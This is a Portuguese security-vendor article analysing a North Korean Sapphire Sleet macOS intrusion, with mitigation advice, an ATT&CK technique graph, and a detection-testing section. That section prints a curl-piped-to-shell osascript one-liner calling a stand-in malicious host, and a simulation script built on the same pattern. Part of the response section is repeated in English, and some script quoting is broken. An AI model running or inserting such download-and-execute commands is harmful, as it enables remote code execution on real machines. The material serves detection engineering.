Dissecando a intrusão macOS do Sapphire Sleet: da isca ao comprometimento

SOC Prime Team

Seguir

Dissecando a intrusão macOS do Sapphire Sleet: da isca ao comprometimento

Detection stack

AIDR
Alert
ETL
Query

Relatório de Ameaça
Fluxo de Ataque
Detecções
Simulações

Resumo

Microsoft Threat Intelligence relatou uma campanha focada em macOS atribuída ao ator patrocinado pelo Estado norte-coreano Sapphire Sleet. A operação se baseia em engenharia social para persuadir os alvos a executar arquivos AppleScript maliciosos apresentados como uma atualização legítima do Zoom SDK. Uma vez executado, o script recupera cargas adicionais através de curl and osascript, expandindo a intrusão em múltiplas etapas. O malware é projetado para roubar credenciais, dados de carteiras de criptomoedas e outras informações sensíveis, além de contornar as proteções nativas de segurança do macOS para permanecer ativo em sistemas comprometidos.

Investigação

A investigação descreve uma cadeia de infecção em múltiplas etapas que começa com um .scpt arquivo de atração e continua através de uma sequência de curl-para-osascript downloads de carga. Pesquisadores identificaram vários componentes de backdoor, incluindo com.apple.cli, um binário de serviços, icloudz, e com.google.chromes.updaters. Os atores da ameaça também foram observados manipulando o banco de dados TCC do macOS para obter permissões de AppleEvents, usando técnicas de carregamento de código reflexivo, e estabelecendo persistência através de um daemon de inicialização. A atividade de exfiltração contou com strings de agente de usuário personalizados e comunicações pelo Telegram Bot API.

Mitigação

A Apple já lançou atualizações de Safe Browsing e XProtect para interromper a infraestrutura da campanha e os componentes de malware. A Microsoft recomenda bloquear a execução de arquivos .scpt , restringir pipelines inseguros curl , monitorar mudanças não autorizadas no banco de dados TCC e auditar instalações de daemon de inicialização para entradas suspeitas. Os usuários também devem ser advertidos sobre prompts de atualização de software não solicitados e orientados a não fornecer credenciais por meio de diálogos ou scripts inesperados.

Resposta

Os defensores devem detectar a execução maliciosa de AppleScript, strings de agente de usuário anormais e conexões de saída para domínios de comando e controle conhecidos. Quaisquer binários identificados e daemons de inicialização devem ser colocados em quarentena ou removidos imediatamente, seguidos por redefinições de credenciais para usuários afetados e validação da integridade do banco de dados TCC. Respondedores de incidentes também devem realizar análises forenses em artefatos de sistemas coletados e restaurar dados impactados a partir de backups limpos sempre que necessário. curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.

graph TB classDef technique fill:#99ccff classDef operator fill:#ff9900 tech_user_execution[“Técnica – T1204.002 Execução pelo Usuário: Arquivo Malicioso Descrição: As vítimas são enganadas para executar um arquivo malicioso que inicia a intrusão.”] class tech_user_execution technique tech_trusted_dev_proxy[“Técnica – T1127 Execução Proxy por Ferramentas de Desenvolvimento Confiáveis Descrição: Ferramentas legítimas são usadas como proxy para executar cargas maliciosas, contornando controles de segurança.”] class tech_trusted_dev_proxy technique tech_subvert_trust[“Técnica – T1553 Subverter Controles de Confiança Descrição: Adversários manipulam relações de confiança para obter privilégios elevados ou executar código.”] class tech_subvert_trust technique tech_launch_daemon[“Técnica – T1543.004 Criar ou Modificar Processo do Sistema: Launch Daemon Descrição: Um novo daemon é criado ou um existente modificado para persistência.”] class tech_launch_daemon technique tech_alt_auth_material[“Técnica – T1550 Uso de Material de Autenticação Alternativo Descrição: Credenciais, tokens ou certificados roubados ou falsificados são usados para autenticação.”] class tech_alt_auth_material technique tech_archive_lib[“Técnica – T1560.002 Arquivamento de Dados: via Biblioteca Descrição: Dados são comprimidos usando biblioteca antes da exfiltração.”] class tech_archive_lib technique tech_exfil_alt_proto[“Técnica – T1048 Exfiltração por Protocolo Alternativo Descrição: Dados são exfiltrados via DNS, FTP ou portas customizadas.”] class tech_exfil_alt_proto technique tech_dynamic_resolution[“Técnica – T1568 Resolução Dinâmica Descrição: Infraestrutura C2 é resolvida em tempo de execução.”] class tech_dynamic_resolution technique tech_reflective_loading[“Técnica – T1620 Carregamento Reflexivo de Código Descrição: Código malicioso é carregado diretamente na memória.”] class tech_reflective_loading technique tech_system_binary_proxy[“Técnica – T1218.003 Execução via Binários do Sistema Descrição: Binários confiáveis são usados para executar payloads maliciosos.”] class tech_system_binary_proxy technique tech_modify_auth_process[“Técnica – T1556.001 Modificar Processo de Autenticação Descrição: Mecanismos de autenticação são alterados para aceitar credenciais falsas.”] class tech_modify_auth_process technique %% Connections tech_user_execution –>|leads_to| tech_trusted_dev_proxy tech_trusted_dev_proxy –>|enables| tech_subvert_trust tech_subvert_trust –>|creates| tech_launch_daemon tech_launch_daemon –>|uses| tech_alt_auth_material tech_alt_auth_material –>|prepares| tech_archive_lib tech_archive_lib –>|triggers| tech_exfil_alt_proto tech_exfil_alt_proto –>|facilitates| tech_dynamic_resolution tech_subvert_trust –>|employs| tech_reflective_loading tech_reflective_loading –>|updates| tech_launch_daemon tech_trusted_dev_proxy –>|leverages| tech_system_binary_proxy tech_system_binary_proxy –>|leads_to| tech_subvert_trust tech_alt_auth_material –>|supports| tech_modify_auth_process tech_modify_auth_process –>|continues| tech_exfil_alt_proto

Fluxo de Ataque

Narrativa de Ataque & Comandos:
Um adversário obteve um script estilo PowerShell malicioso hospedado em um servidor remoto. Para evitar a criação de um binário autônomo, eles aproveitam o interpretador nativo do AppleScript (osascript) e encaminham um curl download diretamente no interpretador, alcançando um “download‑e‑executar” em um único comando. Isso corresponde ao osascript + curl padrão da regra.
```
# Linha única maliciosa que deve acionar a regra
osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'
```
A linha de comando contém ambos osascript and curl, então a condição da regra Sigma (selection_osascript and selection_curl) avalia como verdadeiro.

Script de Teste de Regressão:

# simulate_osascript_curl.sh
# Propósito: Reproduzir a telemetria exata que deve disparar a regra de detecção.
set -e

# Defina uma carga inofensiva para segurança (echo em vez de código maligno real)
MALICIOUS_URL="https://example.com/benign_payload.sh"

# Crie uma carga benigna fictícia que apenas imprime uma mensagem.
# Em um teste real de equipe vermelha, você hospedaria um script real; aqui o mantemos seguro.
curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true

# Execute o AppleScript com curl encanado em um comando shell.
osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""

Comandos de Limpeza:

# cleanup_osascript_curl.sh
# Remova quaisquer arquivos temporários e encerre processos errantes.
rm -f /tmp/benign_payload.sh
pkill -f "osascript -e"

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente